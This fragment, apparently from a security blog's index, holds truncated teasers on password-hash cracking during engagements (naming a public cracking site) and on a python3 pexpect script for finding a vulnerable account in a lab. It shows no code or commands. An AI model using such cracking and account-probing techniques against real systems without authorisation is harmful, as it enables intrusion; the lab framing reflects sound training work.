Below is a screenshot of the small bash script I wrote to assist in this...


28.  Be careful what you use to crack a password hash.  If you are on a private engagement they probably want you to use a private hash cracker.  For this exercise I used crackstation.net.



Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...